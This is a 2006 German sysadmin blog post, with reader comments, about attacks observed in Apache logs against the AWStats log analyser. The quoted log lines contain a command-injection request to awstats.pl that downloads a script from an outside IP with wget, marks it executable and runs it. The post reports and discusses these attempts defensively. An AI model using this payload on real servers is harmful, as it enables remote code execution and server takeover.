Twitter Timeline
- RT @cyman_de: FreeNAS updates to v8.0.3 and is rid of some rubbish and small enough to fit on most usb sticks. netatalk works now with lion1 month ago
- Allen Lesern einen guten Rutsch und ein ein frohes neues Jahr. Unser guter Vorsatz: Mehr bloggen!1 month ago
- RT @slith76: Vim: revisited http://t.co/GIdKrKMz2 months ago
- So sieht es aus, wenn Kunden einen Newsletter rausschicken :) #mailgraph http://t.co/ULg29jon2 months ago
- FreeBSD Buchverlosung: http://t.co/a9t1MZO02 months ago
- RT @jcfrick: Die Cloud hat halt auch Nachteile ;-) http://t.co/vxqdcl6G3 months ago
- Neu im Blog: US-Proxy für YouTube und Co. bei Server4You - das war wohl nix http://t.co/UWow2jzp3 months ago
- Neu im Blog: Iphone 4S gestohlen, Telekom hilft nicht http://t.co/r57REuwI3 months ago
- Shortcuts zur iPhone Prefpane ... nicht ganz so gut wie mit Jailbreak, aber immerhin. http://t.co/TFyZypE13 months ago
- RT @Linux: Fedora 16 "Verne" released! http://t.co/vX7A5Gar #Fedora #Linux3 months ago
- Neu im Blog: Schutz bei (D)DOS Angriffen mit Iptables http://t.co/vDeOdt2w3 months ago
- RT @nbbilliger: Mozilla Firefox 8.0 erschienen http://t.co/Ecn6h1Mp3 months ago
- Fazit nach 2 Tagen iPhone4s: Nett, aber kein Muss, wenn man da 4er hat. Siri ist recht nutzlos atm, Kamera besser. Akku 1:1 bisher. ^rk3 months ago
- Das Nginx-Modul "nginx-sticky-module" erfolgeich getestet und im Einsatz. Blogpost folgt bei Gelegenheit :) http://t.co/G1xBhuWX3 months ago
- Mehrere Kollegen wurden für das Blog begeistert, mal sehen ob gute Artikel folgen ^^ (rk)3 months ago
- Willkommen in der Encoding-Hell: U+C4?U+E4, U+D6?U+F6, U+DC?U+FC, U+DF, U+E4, U+F6, U+FC #german #umlauts3 months ago
- Neu im Blog: Top of the Tops http://t.co/DPx5TreY3 months ago
- Danke, gerne :-) RT @admn_blog_com: Neu im Blog: Acer EasyStore H341 als NAS für SMB und AFP mit Ubuntu Server http://t.co/BGneIG5Q3 months ago
- Neu im Blog: Acer EasyStore H341 als NAS für SMB und AFP mit Ubuntu Server http://t.co/BGneIG5Q3 months ago
- RT @Linux: Ubuntu 11.10 "Oneiric Ocelot" released! #Ubuntu #Linux4 months ago
- Info: Der calendarserver unter Debian Lenny ist inkompatibel mit iOS5. Unter Squeeze hingegen keine Probleme.4 months ago
- Das sind schon ein paar Cores ;-) http://lockerz.com/s/1152337948 months ago
- Nettes Nagios-Monitoring-Tool für das iPhone: NagiMon. Hat allerdings Probleme mit Leerzeichen als Services. http://lockerz.com/s/1131691968 months ago
- JavaScript PC-Emu bootet Linux: http://bit.ly/iygoXG9 months ago
- RT @boeserseo: Mit die beste "How To" Absicherung für Linux Server die ich je gesehen habe! #NSA -> http://klick.es/2z9 months ago
Tuesday, 24. January 2006
AWStats immernoch im Kreuzfeuer
Das durch diverse Sicherheitslücken negativ aufgefallene AWStats scheint für diverse Hackversuche immernoch ein sehr beliebtes Einfalltor zu sein. AWStats ist ein grafisches Auswertungstool für Webserver-Logfiles, geschrieben in Perl. Ich selbst habe es ergänzend zu Webdruid/Webalizer im Einsatz.
So habe ich bei Stichproben in den Apachelogs von heute bereits diverse Einbruchsversuche bemerkt:
Die Quell-IP bleibt gleich (diesmal waren es wohl die bösen Polen), die getesteten Domains hingegen sind immer andere. Sehr merkwürdig das Ganze. Ebenfalls merkwürdig ist die Datei wpoison.words, die ich in /tmp gefunden habe. Keine Ahnung, ob das vielleicht eine Passwortliste oder sowas für Bruteforce sein soll? Mir sagen die Begriffe darin zumindest nichts, wohl aber der Dateiname. Zumindest ist mir dieser schön öfter negativ auf Serversystemen aufgefallen. Vielleicht weiss ja jemand Rat?
Mit einer gewissen Sorge schaue ich ebenfalls auf den neuen Mailwurm Nyxem (was soll das sein, ein "Nyxem"?
) bzw. auf die Mailqueue, die seit gestern auf rund 6000 Mails pro Knoten gestiegen ist. Das ist nicht weiter viel, aber viel wird da ja vielleicht noch kommen. Unsere Virenscanner bereiten sich aber bereits auf einen harten Kampf vor
So habe ich bei Stichproben in den Apachelogs von heute bereits diverse Einbruchsversuche bemerkt:
:~ # grep "wget" /usr/local/apache/logs/httpsd_24_01_2006.log
www.*.de 80.55.2.210 - - [24/Jan/2006:03:03:18 +0100] "GET awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget
%20194%2e102%2e194%2e115%2fscripz%3b
chmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" "-"
www.* 80.55.2.210 - - [24/Jan/2006:03:03:26 +0100] "GET
...
Die Quell-IP bleibt gleich (diesmal waren es wohl die bösen Polen), die getesteten Domains hingegen sind immer andere. Sehr merkwürdig das Ganze. Ebenfalls merkwürdig ist die Datei wpoison.words, die ich in /tmp gefunden habe. Keine Ahnung, ob das vielleicht eine Passwortliste oder sowas für Bruteforce sein soll? Mir sagen die Begriffe darin zumindest nichts, wohl aber der Dateiname. Zumindest ist mir dieser schön öfter negativ auf Serversystemen aufgefallen. Vielleicht weiss ja jemand Rat?
Mit einer gewissen Sorge schaue ich ebenfalls auf den neuen Mailwurm Nyxem (was soll das sein, ein "Nyxem"?
) bzw. auf die Mailqueue, die seit gestern auf rund 6000 Mails pro Knoten gestiegen ist. Das ist nicht weiter viel, aber viel wird da ja vielleicht noch kommen. Unsere Virenscanner bereiten sich aber bereits auf einen harten Kampf vor
Kommentare
Ansicht der Kommentare:
(Linear | Verschachtelt)
Hi,
auch auf meinen Systemen findet sich in den Logs diese Aufrufe, allerdings nicht die besagte Datei in /tmp. Wie kann diese dort überhaupt hingelangen? Über die AwStats-Aufrufe doch wohl kaum, oder?
auch auf meinen Systemen findet sich in den Logs diese Aufrufe, allerdings nicht die besagte Datei in /tmp. Wie kann diese dort überhaupt hingelangen? Über die AwStats-Aufrufe doch wohl kaum, oder?
Die kann z.B. schon über AWStats kommen, sofern sie via wget nachgeladen wurde. Oder durch einen beliebigen User des Systems, durch PHP-Scripte usw.! Gibt leider sehr viele Möglichkeiten. Ein Workaround ist auch, wget mit Chmod 0700 zu versehen, sofern Du es eh nur als root nutzt ...
Rob
Rob
> Vielleicht weiss ja jemand Rat?
http://www.monkeys.com/wpoison/
wpoison.pl: my $tmp_words_file = "/tmp/wpoison.words";
http://www.monkeys.com/wpoison/
wpoison.pl: my $tmp_words_file = "/tmp/wpoison.words";
Mh allerdings wird in diesem Fall wahrscheinlich die Wortliste eher verwendet, um an $string@provdider zu versenden, i.d.R. AOL usw. wenn ich das richtig sehe ...
Rob
Rob
Sehr interessant, denn mir waren derartige Lücken in Awstats bisher nicht bekannt. Werde mal rein interessehalber meine Logs nach derartigen Requests durchsuchen. Aber kein wirklicher Grund zur Sorge - wir nutzen ja schließlich alle eine Authentifikation per .htaccess. Oder nicht...?
Ja, tun wir i.d.R.
Aber beachte bitte, dass das Posting doch schon ein paar Tage alt ist und die Löcher in der aktuellen Version sicher gefixt sind. Ich persönlich benutze AWstats schon länger nicht mehr, eig. nur noch WebDruid und/oder Google-Analytics (jaja, ich weiss .. )
Aber beachte bitte, dass das Posting doch schon ein paar Tage alt ist und die Löcher in der aktuellen Version sicher gefixt sind. Ich persönlich benutze AWstats schon länger nicht mehr, eig. nur noch WebDruid und/oder Google-Analytics (jaja, ich weiss .. )
Ups! Da hab ich ja tatsächlich etwas uraltes ausgegraben ohne es zu bemerken. Ich sollte vielleicht schlafen, sowas ist mir ja noch nie passiert 
Das kenn ich leider nur zu gut. Aber bei dir wird ja immerhin schon fleißig geschrieben. Bei mir scheinen nicht mal nofollow Links dazu anzuregen
Gruß zurück,
Thorsten
Gruß zurück,
Thorsten
Hehe, und das obwohl ich Deinen Artikel darüber vor wenigen Minuten erst gelesen hab
Aber Du hast Recht, nur die wenigsten Besucher/Leser posten tatsächlich mal nen Comment ... schade eigentlich!
Aber Du hast Recht, nur die wenigsten Besucher/Leser posten tatsächlich mal nen Comment ... schade eigentlich!
@Rob
Ich finde es gut. Sonst würde man überall hunderte Beiträge finden, die teilweise unerheblich für diesen Artikel ist.
Ich finde es gut. Sonst würde man überall hunderte Beiträge finden, die teilweise unerheblich für diesen Artikel ist.
powered by
Suche
Kommentare
04.01.12 20:34
Hallo Freunde,
Da ich genau das gleiche Pr [...]
12.12.11 02:46
Hi, ich habe seit einem halben Jahr das Acer [...]
07.12.11 10:03
Ich bin gestern auf Ultrasurf (http://ultras [...]
29.11.11 17:24
Versuchs mal mit Proxys von hidemyass.com - [...]
24.11.11 09:13
Habe den Server nun wieder gekündigt. War wo [...]
16.11.11 19:13
In der USA sind leider manchmal auch ein paa [...]
16.11.11 17:27
Nette Sache, war der Speed in Ordnung? Der P [...]
16.11.11 17:24
Ich habe für den Zweck ein SSH-basierten Pro [...]
16.11.11 17:04
Ja, außerdem sollte es doch dann mit Tinypro [...]
16.11.11 17:03
In der squid.conf den Parameter
forwarded [...]
Gut das auf meinem Server kein AWStats installiert ist. Denn so wie das ausschaut, ist noch immer ein Einbruch möglich, sofern AWStats auf dem Server installiert ist. IM Adminblog hab ich dazu eben einen Beitrag entdeckt. Hatte auch früher schon in v...
Aufgenommen: Jan 24, 10:59